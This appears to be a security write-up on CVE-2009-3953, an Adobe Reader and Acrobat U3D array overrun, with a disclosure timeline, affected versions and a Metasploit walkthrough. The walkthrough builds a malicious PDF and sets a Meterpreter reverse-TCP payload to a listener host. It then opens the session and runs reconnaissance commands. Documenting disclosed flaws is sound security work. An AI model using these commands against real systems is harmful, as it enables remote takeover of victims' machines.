CVE-2009-3953 : Adobe Acrobat U3D CLODProgressiveMeshDeclaration Array Overrun

Timeline :

Vulnerability provided to Secunia by Felipe Andres Manzano for versions prior to 9.2
Vulnerability provided to Secunia by Parvez Anwar for version 9.2
Vulnerabilities provided by Secunia to the vendor
Metasploit PoC provided by duck the 2009-11-25
Coordinated advisory release the 2010-01-12 !

    PoC provided by :

Felipe Andres Manzano
jduck

    Reference(s) :

CVE-2009-3953

    Affected version(s) :

Adobe Reader and Acrobat Professional prior to version 9.3
Acrobat prior to version 8.2

    Tested on Windows XP SP3 with :

    Adobe Reader 9.0.0

    Description :

This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include prior to 7.1.4, prior to 8.2, and prior to 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_u3d_mes­hdecl
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig